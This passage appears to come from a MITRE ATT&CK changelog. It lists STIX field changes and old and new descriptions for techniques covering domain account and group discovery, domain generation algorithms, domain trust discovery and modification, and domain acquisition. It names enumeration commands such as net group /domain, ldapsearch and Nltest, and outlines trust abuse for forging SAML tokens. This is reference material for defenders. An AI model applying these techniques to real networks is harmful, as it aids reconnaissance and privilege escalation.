|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'root', 'SYSTEM', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-28 23:00:00.599000+00:00 | 2022-07-28 18:55:35.987000+00:00 |
| external_references[1]['url'] | https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf | https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf |
| x_mitre_data_sources[0] | Process: Process Creation | Drive: Drive Access |
| x_mitre_data_sources[2] | Driver: Driver Load | Process: Process Creation |
| x_mitre_data_sources[3] | Drive: Drive Access | Driver: Driver Load |
| Description |
|---|
| Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior. Commands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain users and groups. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['ExtraHop', 'Miriam Wiesner, @miriamxyra, Microsoft Security'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-13 14:05:14.784000+00:00 | 2022-08-25 13:04:00.863000+00:00 |
| x_mitre_data_sources[2] | Command: Command Execution | Network Traffic: Network Traffic Content |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution | |
| x_mitre_data_sources | Group: Group Enumeration | |
| x_mitre_data_sources | Process: OS API Execution |
| Old Description | New Description |
|---|---|
| Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. | Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016. | |
| external_references | CAPEC-560 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-560 | |
| external_references | Ubuntu. (n.d.). SSSD. Retrieved September 23, 2021. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-19 03:29:47.651000+00:00 | 2022-04-19 20:14:34.479000+00:00 |
| description | Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. | Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. |
| external_references[1]['source_name'] | capec | TechNet Credential Theft |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/560.html | https://technet.microsoft.com/en-us/library/dn535501.aspx |
| external_references[2]['source_name'] | TechNet Credential Theft | TechNet Audit Policy |
| external_references[2]['description'] | Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016. | Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. |
| external_references[2]['url'] | https://technet.microsoft.com/en-us/library/dn535501.aspx | https://technet.microsoft.com/en-us/library/dn487457.aspx |
| external_references[4]['source_name'] | TechNet Audit Policy | Ubuntu SSSD Docs |
| external_references[4]['description'] | Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. | Ubuntu. (n.d.). SSSD. Retrieved September 23, 2021. |
| external_references[4]['url'] | https://technet.microsoft.com/en-us/library/dn487457.aspx | https://ubuntu.com/server/docs/service-sssd |
| external_references[5]['source_name'] | Ubuntu SSSD Docs | capec |
| external_references[5]['url'] | https://ubuntu.com/server/docs/service-sssd | https://capec.mitre.org/data/definitions/560.html |
| x_mitre_data_sources[1] | User Account: User Account Authentication | Logon Session: Logon Session Creation |
| x_mitre_data_sources[2] | Logon Session: Logon Session Creation | User Account: User Account Authentication |
| Old Description | New Description |
|---|---|
| Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019) DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation) Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity) | Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019) DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation) Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity) |
Dropped Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-11-10 18:28:57.002000+00:00 | 2022-03-11 18:26:23.432000+00:00 |
| description | Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019) DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation) Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity) | Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019) DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation) Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Connection Creation |
| Description |
|---|
| Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators. Commands such as net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain-level groups. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Harshal Tupsamudre, Qualys', 'Miriam Wiesner, @miriamxyra, Microsoft Security'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-12 19:07:53.043000+00:00 | 2022-10-21 12:55:51.337000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: OS API Execution | |
| x_mitre_data_sources | Group: Group Enumeration |
| Old Description | New Description |
|---|---|
| Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). | Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments.(Citation: Azure Active Directory Reconnaisance)(Citation: Office 265 Azure Domain Availability) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Jannie Li, Microsoft Threat Intelligence Center (MSTIC)'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:30:33.508000+00:00 | 2022-10-21 14:32:05.257000+00:00 |
| description | Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). | Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments.(Citation: Azure Active Directory Reconnaisance)(Citation: Office 265 Azure Domain Availability) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). |
| external_references[1]['source_name'] | WHOIS | Circl Passive DNS |
| external_references[1]['description'] | NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. | CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020. |
| external_references[1]['url'] | https://www.whois.net/ | https://www.circl.lu/services/passive-dns/ |
| external_references[2]['source_name'] | DNS Dumpster | Azure Active Directory Reconnaisance |
| external_references[2]['description'] | Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020. | Dr. Nestori Syynimaa. (2020, June 13). Just looking: Azure Active Directory reconnaissance as an outsider. Retrieved May 27, 2022. |
| external_references[2]['url'] | https://dnsdumpster.com/ | https://o365blog.com/post/just-looking/ |
| external_references[3]['source_name'] | Circl Passive DNS | DNS Dumpster |
| external_references[3]['description'] | CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020. | Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020. |
| external_references[3]['url'] | https://www.circl.lu/services/passive-dns/ | https://dnsdumpster.com/ |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Office 265 Azure Domain Availability', 'description': 'Microsoft. (2017, January 23). (Cloud) Tip of the Day: Advanced way to check domain availability for Office 365 and Azure. Retrieved May 27, 2022.', 'url': 'https://docs.microsoft.com/en-us/archive/blogs/tip_of_the_day/cloud-tip-of-the-day-advanced-way-to-check-domain-availability-for-office-365-and-azure'} | |
| external_references | {'source_name': 'WHOIS', 'description': 'NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.', 'url': 'https://www.whois.net/'} |
| Description |
|---|
| Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-09-17 18:26:17.858000+00:00 | 2022-06-16 19:18:22.305000+00:00 |
| external_references[1]['source_name'] | Microsoft Trusts | Microsoft Operation Wilysupply |
| external_references[1]['description'] | Microsoft. (2009, October 7). Trust Technologies. Retrieved February 14, 2019. | Florio, E.. (2017, May 4). Windows Defender ATP thwarts Operation WilySupply software supply chain cyberattack. Retrieved February 14, 2019. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10) | https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/ |
| external_references[3]['source_name'] | Harmj0y Domain Trusts | Microsoft Trusts |
| external_references[3]['description'] | Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019. | Microsoft. (2009, October 7). Trust Technologies. Retrieved February 14, 2019. |
| external_references[3]['url'] | http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ | https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10) |
| external_references[4]['source_name'] | Microsoft Operation Wilysupply | Microsoft GetAllTrustRelationships |
| external_references[4]['description'] | Florio, E.. (2017, May 4). Windows Defender ATP thwarts Operation WilySupply software supply chain cyberattack. Retrieved February 14, 2019. | Microsoft. (n.d.). Domain.GetAllTrustRelationships Method. Retrieved February 14, 2019. |
| external_references[4]['url'] | https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/ | https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships |
| external_references[5]['source_name'] | Microsoft GetAllTrustRelationships | Harmj0y Domain Trusts |
| external_references[5]['description'] | Microsoft. (n.d.). Domain.GetAllTrustRelationships Method. Retrieved February 14, 2019. | Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019. |
| external_references[5]['url'] | https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships | https://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944 |
| x_mitre_data_sources[2] | Process: OS API Execution | Network Traffic: Network Traffic Content |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | ExtraHop | |
| x_mitre_data_sources | Process: OS API Execution |
| Old Description | New Description |
|---|---|
| Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. | Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. 
An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-01-11 18:21:20.213000+00:00 | 2022-10-21 16:09:14.555000+00:00 |
| description | Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. | Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. 
An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) |
| external_references[1]['source_name'] | Microsoft - Azure AD Federation | CISA SolarWinds Cloud Detection |
| external_references[1]['description'] | Microsoft. (2018, November 28). What is federation with Azure AD?. Retrieved December 30, 2020. | CISA. (2021, January 8). Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments. Retrieved January 8, 2021. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed | https://us-cert.cisa.gov/ncas/alerts/aa21-008a |
| external_references[2]['source_name'] | Microsoft - Azure Sentinel ADFSDomainTrustMods | AADInternals zure AD Federated Domain |
| external_references[2]['description'] | Microsoft. (2020, December). Azure Sentinel Detections. Retrieved December 30, 2020. | Dr. Nestori Syynimaa. (2017, November 16). Security vulnerability in Azure AD & Office 365 identity federation. Retrieved September 28, 2022. |
| external_references[2]['url'] | https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml | https://o365blog.com/post/federation-vulnerability/ |
| external_references[3]['source_name'] | Sygnia Golden SAML | Microsoft - Azure AD Federation |
| external_references[3]['description'] | Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021. | Microsoft. (2018, November 28). What is federation with Azure AD?. Retrieved December 30, 2020. |
| external_references[3]['url'] | https://www.sygnia.co/golden-saml-advisory | https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed |
| external_references[4]['source_name'] | CISA SolarWinds Cloud Detection | Microsoft - Azure Sentinel ADFSDomainTrustMods |
| external_references[4]['description'] | CISA. (2021, January 8). Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments. Retrieved January 8, 2021. | Microsoft. (2020, December). Azure Sentinel Detections. Retrieved December 30, 2020. |
| external_references[4]['url'] | https://us-cert.cisa.gov/ncas/alerts/aa21-008a | https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml |
| x_mitre_data_sources[0] | Active Directory: Active Directory Object Creation | Active Directory: Active Directory Object Modification |
| x_mitre_data_sources[1] | Active Directory: Active Directory Object Modification | Active Directory: Active Directory Object Creation |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Sygnia Golden SAML', 'description': 'Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021.', 'url': 'https://www.sygnia.co/golden-saml-advisory'} | |
| x_mitre_contributors | Praetorian |
| Old Description | New Description |
|---|---|
| Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. Adversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016) Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1) | Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. 
